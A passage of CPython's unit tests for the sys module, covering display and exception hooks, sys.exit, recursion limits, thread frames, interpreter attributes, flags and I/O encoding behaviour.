self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ActiveExceptionTests(unittest.TestCase):
def test_exc_info_no_exception(self):
self.assertEqual(sys.exc_info(), (None, None, None))
def test_sys_exception_no_exception(self):
self.assertEqual(sys.exception(), None)
def test_exc_info_with_exception_instance(self):
def f():
raise ValueError(42)
try:
f()
except Exception as e_:
e = e_
exc_info = sys.exc_info()
self.assertIsInstance(e, ValueError)
self.assertIs(exc_info[0], ValueError)
self.assertIs(exc_info[1], e)
self.assertIs(exc_info[2], e.__traceback__)
def test_exc_info_with_exception_type(self):
def f():
raise ValueError
try:
f()
except Exception as e_:
e = e_
exc_info = sys.exc_info()
self.assertIsInstance(e, ValueError)
self.assertIs(exc_info[0], ValueError)
self.assertIs(exc_info[1], e)
self.assertIs(exc_info[2], e.__traceback__)
def test_sys_exception_with_exception_instance(self):
def f():
raise ValueError(42)
try:
f()
except Exception as e_:
e = e_
exc = sys.exception()
self.assertIsInstance(e, ValueError)
self.assertIs(exc, e)
def test_sys_exception_with_exception_type(self):
def f():
raise ValueError
try:
f()
except Exception as e_:
e = e_
exc = sys.exception()
self.assertIsInstance(e, ValueError)
self.assertIs(exc, e)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
@unittest.skipUnless(support.is_emscripten, "only available on Emscripten")
def test_emscripten_info(self):
self.assertEqual(len(sys._emscripten_info), 4)
self.assertIsInstance(sys._emscripten_info.emscripten_version, tuple)
self.assertIsInstance(sys._emscripten_info.runtime, (str, type(None)))
self.assertIsInstance(sys._emscripten_info.pthreads, bool)
self.assertIsInstance(sys._emscripten_info.shared_memory, bool)
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding", "safe_path")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr in ("dev_mode", "safe_path") else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
@support.requires_subprocess()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
@support.requires_subprocess()
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@support.requires_subprocess()
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
@support.requires_subprocess()
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
@support.requires_subprocess()
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
@support.requires_subprocess()
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@support.requires_subprocess()
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
